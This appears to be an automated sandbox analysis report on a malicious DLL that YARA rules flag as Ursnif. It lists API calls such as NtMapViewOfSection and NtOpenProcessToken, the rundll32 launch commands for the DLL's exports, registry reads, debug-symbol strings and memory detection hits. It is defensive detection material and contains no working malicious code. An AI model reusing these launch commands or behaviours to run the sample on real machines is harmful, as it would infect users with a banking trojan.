Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_012B2B76	3_2_012B2B76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_012B4C40	3_2_012B4C40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECF5600	3_2_6ECF5600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED2D630	3_2_6ED2D630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED43CCE	3_2_6ED43CCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED2B597	3_2_6ED2B597
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED3A2B1	3_2_6ED3A2B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED1E8C0	3_2_6ED1E8C0

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6ED1ABD1 appears 91 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6ED1ABD1 appears 91 times

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_6ECE15C6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE1273 NtMapViewOfSection,	0_2_6ECE1273
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE13B8 GetProcAddress,NtCreateSection,memset,	0_2_6ECE13B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE23D5 NtQueryVirtualMemory,	0_2_6ECE23D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00755D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_00755D10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0075B149 NtQueryVirtualMemory,	0_2_0075B149
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_012B5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_012B5D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_012BB149 NtQueryVirtualMemory,	3_2_012BB149

Source: 6yDD19jMIu.dll

Virustotal: Detection: 9%

Source: 6yDD19jMIu.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER618E.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winDLL@14/12@14/7

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00754A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00754A03

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4680
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3056
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6048

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: 6yDD19jMIu.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 6yDD19jMIu.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.482429181.0000000004AE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.500262352.0000000004CE3000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbQ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbE source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdbI source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.482428909.00000000036AE000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdbC source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.645023107.000000006ED5B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645833298.000000006ED5B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbw source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb_ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.501149079.0000000000D02000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE2150 push ecx; ret	0_2_6ECE2159
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE21A3 push ecx; ret	0_2_6ECE21B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0075AF13 push ecx; ret	0_2_0075AF23
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0075ABE0 push ecx; ret	0_2_0075ABE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED1AB9A push ecx; ret	0_2_6ED1ABAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_012BAF13 push ecx; ret	3_2_012BAF23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_012BABE0 push ecx; ret	3_2_012BABE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED1AB9A push ecx; ret	3_2_6ED1ABAD

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECE1DE5 LoadLibraryA,GetProcAddress,

0_2_6ECE1DE5

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
